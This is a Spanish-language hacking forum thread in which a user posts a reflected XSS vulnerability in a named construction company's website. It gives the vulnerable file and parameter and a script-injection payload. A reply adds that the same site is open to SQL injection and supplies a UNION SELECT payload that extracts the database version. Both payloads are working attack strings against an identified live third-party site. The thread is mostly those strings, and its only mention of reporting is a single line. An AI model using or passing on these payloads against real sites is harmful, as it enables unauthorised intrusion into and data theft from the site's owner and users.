[XSS] Dynasty Builders - http://www.dynastybuilders.ca/

Iniciado por Drok3r, Julio 22, 2018, 07:53:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 22, 2018, 07:53:09 PM
    Captura de pantalla


    Url del sitio
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

        Vector
  • Archivo y Parametro: custom-gallery.php?id=
  • Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
  • PoC:
    ----> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

        Autor
    [!] Drok3r (redbirdTEAM - CiberSecurityRECON)

        Reportado: SI
Julio 22, 2018, 11:10:22 PM #1
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Julio 26, 2018, 06:52:34 PM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!


Aaaa que cosas.... jeje Gracias por el dato.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario